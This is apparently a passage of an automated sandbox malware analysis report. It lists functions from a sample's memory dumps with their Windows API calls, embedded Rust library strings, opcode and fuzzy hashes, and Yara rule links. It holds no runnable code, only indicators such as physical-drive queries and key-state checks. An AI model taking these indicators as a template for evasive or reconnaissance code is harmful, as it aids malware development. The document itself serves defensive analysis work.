                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                              • Opcode ID: b41a0e1cd665821b5796c0b158887a0f5ecc602c8a934c1cc93d59222d264265
                                                                                                                                              • Instruction ID: 5f89f51c378ddf9a993613850ddd4fdb9b59cca54c9a044c803801dbacbd09c9
                                                                                                                                              • Opcode Fuzzy Hash: b41a0e1cd665821b5796c0b158887a0f5ecc602c8a934c1cc93d59222d264265
                                                                                                                                              • Instruction Fuzzy Hash: 3DF07A76D00128DBCB20ABF4EC4859EB7B8FF49255BC24571E801E7160DB74A9558B98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00409F46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00409F80
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 00409FD6
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A044
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                              • String ID: \\.\PhysicalDrive%d
                                                                                                                                              • API String ID: 33631002-2935326385
                                                                                                                                              • Opcode ID: 612e0084ea0f5b9f7467d435850855356c6e55c0f1ce1109650d98a2500b2ad0
                                                                                                                                              • Instruction ID: 827c4b2f77838a6cf85fa88315384c3a64bdadd1ed3bfbc8410d8de3e49c6994
                                                                                                                                              • Opcode Fuzzy Hash: 612e0084ea0f5b9f7467d435850855356c6e55c0f1ce1109650d98a2500b2ad0
                                                                                                                                              • Instruction Fuzzy Hash: 1F21ACB290421DAEE711EBA59C85EFF737CEB45318F0404BBF515E2081E67C9E844B69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025A53DD Relevance: 6.6, APIs: 2, Strings: 2, Instructions: 605memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A585A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A588B
                                                                                                                                              Strings
                                                                                                                                              • assertion failed: secondary_table_len <= 0x7ff, xrefs: 025A5C5C
                                                                                                                                              • Invalid, xrefs: 025A5C48
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: Invalid$assertion failed: secondary_table_len <= 0x7ff
                                                                                                                                              • API String ID: 3298025750-1198909562
                                                                                                                                              • Opcode ID: 9654291d7c632642ddf79b6f0a64712eff233336baec77bf083ddf7e44bd2aa0
                                                                                                                                              • Instruction ID: c4ba3c13f6d4bb33f07ce4c3927e3d0e94d8baa3f1cb4a9dff29fff47ebdde31
                                                                                                                                              • Opcode Fuzzy Hash: 9654291d7c632642ddf79b6f0a64712eff233336baec77bf083ddf7e44bd2aa0
                                                                                                                                              • Instruction Fuzzy Hash: 0F327C71E147914BE3258F28C891BBEB7E1FFC8300F558A2DE5C597281E734A885CB89
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025B1180 Relevance: 6.5, Strings: 5, Instructions: 252COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$G$_$_${invalid syntax}{recursion limit reached}?'for<> , ::{closureshim# as mut const ; dyn + unsafe extern "
                                                                                                                                              • API String ID: 0-1976165044
                                                                                                                                              • Opcode ID: 95c63963ce4204f5887e8df1a3504097efe7876923886ce1ea095cb2879404dc
                                                                                                                                              • Instruction ID: 0af72eed14068cbabcf43c3d203b7b57fbb53d5e08aadcac68c0eb141e1bfacd
                                                                                                                                              • Opcode Fuzzy Hash: 95c63963ce4204f5887e8df1a3504097efe7876923886ce1ea095cb2879404dc
                                                                                                                                              • Instruction Fuzzy Hash: C381F270704F014BEBAA8E65D8B03BBB7D2BF81748F14C83CC99E87B92E721D4458649
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025811A0 Relevance: 6.5, APIs: 2, Strings: 2, Instructions: 475memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02572678: HeapFree.KERNEL32(00000000,?,025812D5), ref: 0257269A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02581587
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,025BC142), ref: 02581775
                                                                                                                                              Strings
                                                                                                                                              • `async fn` resumed after completion, xrefs: 025816EA, 025816FE
                                                                                                                                              • assertion failed: prev/registry\src\index.crates.io-1cd66030c949c28d\futures-util-0.3.30\src\stream\futures_unordered\mod.rs, xrefs: 025816D1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: `async fn` resumed after completion$assertion failed: prev/registry\src\index.crates.io-1cd66030c949c28d\futures-util-0.3.30\src\stream\futures_unordered\mod.rs
                                                                                                                                              • API String ID: 3298025750-1060740151
                                                                                                                                              • Opcode ID: 58467ffea845e365a1c9344603558c3a38c68ba689d827d2afe0c3fbeb565ae0
                                                                                                                                              • Instruction ID: 1438d947de6daa15c515ade3fcbfc628c800df7ea83c9b2b8ccec3080b274f07
                                                                                                                                              • Opcode Fuzzy Hash: 58467ffea845e365a1c9344603558c3a38c68ba689d827d2afe0c3fbeb565ae0
                                                                                                                                              • Instruction Fuzzy Hash: F812BF70604B418FC714EF19C480B6ABBE1BF84314F19C95DE99AAB761DB71E842CF89
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00424B38 Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042663C: GetWindowLongA.USER32(?,000000F0), ref: 00426648
                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00424B5C
                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00424B65
                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00424B6E
                                                                                                                                              • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 00424B84
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: State$LongMessageSendWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1063413437-0
                                                                                                                                              • Opcode ID: 6dc76eaeebcb73aca116473ecfa999c7a0d89d7e04904cc6fc94326bd96b1de0
                                                                                                                                              • Instruction ID: f4eab9a2a9dbeb830affcc38af44a6143a2cea5949d8d34eabc04b707fed75f8
                                                                                                                                              • Opcode Fuzzy Hash: 6dc76eaeebcb73aca116473ecfa999c7a0d89d7e04904cc6fc94326bd96b1de0
                                                                                                                                              • Instruction Fuzzy Hash: D2F0E93634036A55D52032B96C05FB65528CFC0BB4FC1063AB703EA1D6C998D807057C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00423119 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0042312C
                                                                                                                                              • GetActiveWindow.USER32 ref: 00423137
                                                                                                                                              • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423145
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423161
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Active$EnableFreeResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3751187028-0
                                                                                                                                              • Opcode ID: cf1dc8f164079878ce4882cf31a04c95128d9af479deed743c0b8a2d04076335
                                                                                                                                              • Instruction ID: ca44568af34e6e7f10c41bee158ea285ab5cab5ae77f8efcc955b62aa56a5184
                                                                                                                                              • Opcode Fuzzy Hash: cf1dc8f164079878ce4882cf31a04c95128d9af479deed743c0b8a2d04076335
                                                                                                                                              • Instruction Fuzzy Hash: C2F0AF35B00655CFCF20EFA4E9455AEBBB1FF08712F90457AE142B22A0C7795E06CE08
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025DE0C8 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,025DE1E8,02613D44), ref: 025DE0CD
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(025DE1E8,?,025DE1E8,02613D44), ref: 025DE0D6
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,025DE1E8,02613D44), ref: 025DE0E1
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,025DE1E8,02613D44), ref: 025DE0E8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                              • Opcode ID: 3294e27e112322ae897c0baf94352aa68a3838cb2f4b0b047ace22c56050d541
                                                                                                                                              • Instruction ID: e4dc0cd84a24f916026241bb3045911045fb576f6df082518c63e6b1b8fb9303
                                                                                                                                              • Opcode Fuzzy Hash: 3294e27e112322ae897c0baf94352aa68a3838cb2f4b0b047ace22c56050d541
                                                                                                                                              • Instruction Fuzzy Hash: F2D002B2885204FFDA802FE1E80DE597F2DEB09756F018810FB09C5451DB715465AF6D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040CFF1 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 150943dc08c0167bc979cefcd71375d35153985db1d35b0f95c289b28cd95639
                                                                                                                                              • Instruction ID: 9fb67a88a75419fde22a6fe78b171526936af48b614b9b5a9a44be6ca3831610
                                                                                                                                              • Opcode Fuzzy Hash: 150943dc08c0167bc979cefcd71375d35153985db1d35b0f95c289b28cd95639
                                                                                                                                              • Instruction Fuzzy Hash: C6F03631900149ABDF116FA1CD4496F3B79AF05348F848036FD19A50A0D739D61FDB59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D632B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?,00000001,00000000,?,?,025D8053,00000000,026117FC,?,?,?,?,?,?,?,?), ref: 025D6335
                                                                                                                                              Strings
                                                                                                                                              • RNG seed generator is internally corrupt/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\util\rand\rt.rs, xrefs: 025D63B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AcquireExclusiveLock
                                                                                                                                              • String ID: RNG seed generator is internally corrupt/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\util\rand\rt.rs
                                                                                                                                              • API String ID: 4021432409-4259227343
                                                                                                                                              • Opcode ID: 397d4fcfe63ca4ddd902b7bfb1dce5bf7ec1e17bf55d05cc9cd0ebbf50ef03b9
                                                                                                                                              • Instruction ID: e77f761cd59d825945d67d7507ad36fcf4539c261ba9d1fcf5172866716ae819
                                                                                                                                              • Opcode Fuzzy Hash: 397d4fcfe63ca4ddd902b7bfb1dce5bf7ec1e17bf55d05cc9cd0ebbf50ef03b9
                                                                                                                                              • Instruction Fuzzy Hash: 1D1148723047121B936CAD6AAC4142BB78BEBC4221318C63EDD6A83784C9B0B80BD3C4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025ED3D0 Relevance: 3.1, APIs: 2, Instructions: 562memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025ED82B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 7430a8806362831550e67dd656cdd3c1a737dd2b20cea620a94fb6bf618db543
                                                                                                                                              • Instruction ID: a4a8ccdc321e0135de171f4120c7ce2549ec265cd233c50ba5260961123efd03
                                                                                                                                              • Opcode Fuzzy Hash: 7430a8806362831550e67dd656cdd3c1a737dd2b20cea620a94fb6bf618db543
                                                                                                                                              • Instruction Fuzzy Hash: E122F471A097468BDB19CF2CC48056AFBF2BFC8304F188A2DE99A97351E731D945CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00401000 Relevance: 3.0, APIs: 2, Instructions: 33threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 00401006
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 00401019
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232894706-0
                                                                                                                                              • Opcode ID: 1bfd077805e0b76a4cd0a89f1b1b1ebcb8d6ab1a177264c64a3ab03ef4350e1d
                                                                                                                                              • Instruction ID: dbec01051d8a6e41623a92cbe54c504c300f99dd774cbdae9b06207f921894f7
                                                                                                                                              • Opcode Fuzzy Hash: 1bfd077805e0b76a4cd0a89f1b1b1ebcb8d6ab1a177264c64a3ab03ef4350e1d
                                                                                                                                              • Instruction Fuzzy Hash: 29F0E93660536097CA218F14DC407E737246F01B81F8001BDEDC5A72A1E639584F86B9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0256A1B0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0000$attempt to divide by zero
                                                                                                                                              • API String ID: 0-2494717124
                                                                                                                                              • Opcode ID: 0cad660c0c1fbe2755e573ced41b02f0711ecc42a0d3bceca2abc1d14c555ce7
                                                                                                                                              • Instruction ID: 9da0a723811b3ff3984ffba6982eb93b87d7e308ffbf025e97ab45d2e57ceaed
                                                                                                                                              • Opcode Fuzzy Hash: 0cad660c0c1fbe2755e573ced41b02f0711ecc42a0d3bceca2abc1d14c555ce7
                                                                                                                                              • Instruction Fuzzy Hash: DBF147B4A083419FD708CF19C4A466ABBE2FFD8354F54C92EE49AAB351D730D845CB4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00404E54 Relevance: 2.9, Strings: 1, Instructions: 1648COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 6e12085c91d98f2496f3240a5fa84f917683bfd7915eecf5a36aaaec95f5d5b0
                                                                                                                                              • Instruction ID: 8f72e5d40509f8cecb0b844fc2ba54b400947ee985e677df0f2cd9a9c27687f1
                                                                                                                                              • Opcode Fuzzy Hash: 6e12085c91d98f2496f3240a5fa84f917683bfd7915eecf5a36aaaec95f5d5b0
                                                                                                                                              • Instruction Fuzzy Hash: CBF27471E102099FCF08DFA5C992AEEB7F2FF88308F18446AD516B7241D738AA51DB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02562670 Relevance: 2.8, Strings: 2, Instructions: 277COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • Invalid, xrefs: 02562A18
                                                                                                                                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0256297D, 02562995, 025629C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$Invalid
                                                                                                                                              • API String ID: 0-3863875730
                                                                                                                                              • Opcode ID: 49e9c58ea4fa8f4e2eed81fba4eaa1cd821059ed064379e7a27249be80ba6442
                                                                                                                                              • Instruction ID: 8329f36c3ad896fbddf4f99fbf4422dbe04bb97ab33587e6871cacff943a2576
                                                                                                                                              • Opcode Fuzzy Hash: 49e9c58ea4fa8f4e2eed81fba4eaa1cd821059ed064379e7a27249be80ba6442
                                                                                                                                              • Instruction Fuzzy Hash: 9AA13432B083154BD7189E2DC89833ABBD6FBC4314F19863EE89ACB3D1D6759845CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025AB13B Relevance: 1.8, Strings: 1, Instructions: 576COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • attempted to use a condition variable with more than one mutex/registry\src\index.crates.io-1cd66030c949c28d\parking_lot-0.12.1\src\condvar.rs, xrefs: 025AB81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$PerformanceQuery$CounterFrequency
                                                                                                                                              • String ID: attempted to use a condition variable with more than one mutex/registry\src\index.crates.io-1cd66030c949c28d\parking_lot-0.12.1\src\condvar.rs
                                                                                                                                              • API String ID: 1966996841-1284212713
                                                                                                                                              • Opcode ID: 9980fec389cb0dc9424b767e0e3e07ccd9c1c45cdbc3164d284e44b303bfce26
                                                                                                                                              • Instruction ID: ec16d344ae116e9ffb2c3860c7bd69458fb606b978e24213f21b237ecedfcdc6
                                                                                                                                              • Opcode Fuzzy Hash: 9980fec389cb0dc9424b767e0e3e07ccd9c1c45cdbc3164d284e44b303bfce26
